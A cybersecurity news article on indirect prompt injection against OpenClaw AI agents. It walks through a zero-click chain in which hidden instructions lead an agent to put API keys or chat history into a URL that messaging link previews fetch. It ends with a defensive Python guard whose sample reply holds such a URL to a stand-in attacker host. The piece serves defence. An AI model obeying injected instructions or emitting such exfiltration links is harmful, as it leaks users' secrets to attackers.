OpenClaw AI Agents Leaking Sensitive Data in Indirect Prompt Injection Attacks

Attackers can exploit insecure defaults and prompt injection vulnerabilities to turn normal agent behavior into a silent data-exfiltration pipeline.

The core issue is not just that the model can be confused; it is that the agent can be steered into exfiltrating sensitive information without any user interaction. The most alarming demonstration comes from security firm PromptArmor.

PromptArmor showed how an attacker can force an OpenClaw agent to leak data by combining indirect prompt injection with the link-preview feature of messaging apps.

0-Click Attack Chain

  • An attacker hides malicious instructions inside content the agent is expected to read, such as a web page, an e-mail, or a shared document.
  • The agent follows the instructions and constructs a URL pointing at an attacker-controlled host.
  • The agent encodes sensitive data, such as API keys or private conversation history, into the URL’s query parameters.
  • The agent sends the resulting link back to the user through a messaging platform such as Telegram or Discord.
  • Before the user clicks anything, the messaging platform fetches the URL to render a link preview, delivering the embedded data to the attacker’s server.

Because the messaging app’s auto-preview feature automatically triggers an outbound HTTP request, this creates a dangerous “no-click” attack. The agent’s response itself becomes the exfiltration event.

According to CNCERT, OpenClaw’s default security posture poses significant enterprise risk by allowing agents to browse, execute tasks, or interact with local files.

They categorized threats into four main areas: indirect prompt injection via external data, accidental destructive actions, malicious third-party activities, and the exploitation of known product vulnerabilities.

OpenClaw is useful precisely because it can do real work, but that autonomy makes a compromise far more damaging. Several aspects of a typical deployment amplify the impact:

  • Messaging integrations where auto-preview behaviors create seamless pathways for data theft.
  • Host and container access that allows prompt manipulation to translate into real-world system actions.
  • A skills ecosystem where unvetted or malicious extensions can drastically widen the attack surface.
  • Proximity to stored secrets, as agents often operate near operational credentials and tokens.

As OpenAI recently highlighted, once an agent can retrieve external information and act autonomously, developers must assume that untrusted content will attempt to manipulate the system.

Invaders reports that security teams should treat this issue as an architectural flaw rather than a simple AI bug. To protect deployments, organizations should implement the following measures:

  • Disable auto-preview features in Telegram, Discord, Slack, and any other channel where AI agents can emit URLs.

  • Isolate OpenClaw runtimes inside tightly controlled containers and keep default management ports off the public internet.
  • Restrict unnecessary file system access and keep credentials out of plaintext configuration files.
  • Install agent skills only from trusted sources and manually review third-party code before enabling it.
  • Set up network monitoring to alert on agent-generated links pointing to unfamiliar domains or unexpected DNS lookups.
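The attack chain above and the last two mitigations (keeping secrets out of the agent's reach and alerting on agent-generated links to unfamiliar domains) can be combined into an outbound guard that runs on every message before the agent hands it to a chat integration. The following is an added example written for this page; it is not code from OpenClaw, PromptArmor, or the article. The agent reply, the secret values, the allowed-domain list, and the `attacker.example.net` host are all constructed placeholders.

```python
"""
Outbound guard for an AI agent's chat messages (added example, not OpenClaw code).

Models the 0-click chain: an injected instruction makes the agent emit a URL
whose query string carries a secret. Before the message reaches Telegram or
Discord, every URL is checked for (1) an unfamiliar destination domain,
(2) secret values the agent had access to, and (3) high-entropy query values
that could be an encoded secret. Failing URLs are replaced with plain text so
the channel's link preview has nothing to fetch.
"""
import math
import re
from urllib.parse import parse_qsl, unquote, urlsplit

URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")

# Constructed stand-ins for secrets the agent can reach (assumption: loaded from env/config).
KNOWN_SECRETS = {
    "OPENAI_API_KEY": "sk-example-0123456789abcdef0123456789abcdef",
    "GITHUB_TOKEN": "ghp_exampleExampleExampleExampleExample0000",
}

# Domains the agent is legitimately allowed to link to (assumption for the example).
ALLOWED_DOMAINS = {"example.com"}

# Query values at least this long with at least this many bits/char look like encoded secrets.
ENTROPY_MIN_LEN = 20
ENTROPY_THRESHOLD = 3.5


def _host_allowed(host):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def _entropy(s):
    """Shannon entropy in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def find_urls(text):
    return URL_RE.findall(text)


def inspect_url(url, secrets=KNOWN_SECRETS):
    """Return a list of findings for one URL; an empty list means it passed."""
    findings = []
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not _host_allowed(host):
        findings.append(f"unfamiliar domain: {host}")

    query = parse_qsl(parts.query, keep_blank_values=True)  # values are percent-decoded here
    carriers = [v for _, v in query] + [unquote(parts.path), unquote(parts.fragment)]
    for name, value in secrets.items():
        if any(value in c for c in carriers):
            findings.append(f"query/path carries {name}")

    for key, value in query:
        if len(value) >= ENTROPY_MIN_LEN and _entropy(value) > ENTROPY_THRESHOLD:
            findings.append(f"high-entropy query value in '{key}'")
    return findings


def sanitize_message(text, secrets=KNOWN_SECRETS):
    """
    Replace every URL that fails inspection with a non-clickable placeholder.
    Returns (sanitized_text, {url: findings}) so the findings can be alerted on.
    """
    findings = {}

    def _repl(match):
        url = match.group(0)
        problems = inspect_url(url, secrets)
        if problems:
            findings[url] = problems
            return "[link removed by outbound guard]"
        return url

    return URL_RE.sub(_repl, text), findings


# Constructed agent reply: what an injected instruction makes the agent send to the user.
AGENT_REPLY = (
    "Done! Here is the report you asked for: "
    "https://attacker.example.net/collect?key=sk-example-0123456789abcdef0123456789abcdef"
    "&chat=hello%20world"
)

if __name__ == "__main__":
    clean, flagged = sanitize_message(AGENT_REPLY)
    print(clean)
    for url, problems in flagged.items():
        print("ALERT:", url, "->", "; ".join(problems))
```

The guard is a last line of defense, not a substitute for disabling previews: Telegram's `sendMessage` accepts `disable_web_page_preview` (or `link_preview_options` with `is_disabled` set) and Discord messages can set the `SUPPRESS_EMBEDS` flag, so the integration should set those on every agent-authored message regardless of what the guard finds. The entropy check is deliberately a heuristic; tune the threshold against the agent's normal output, and feed the returned findings into the same alerting pipeline as the DNS and network monitoring.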

Ultimately, the most important question for security teams is no longer whether an AI model can be manipulated, but rather what a manipulated agent is silently capable of doing next.


The post OpenClaw AI Agents Leaking Sensitive Data in Indirect Prompt Injection Attacks appeared first on Cyber Security News.
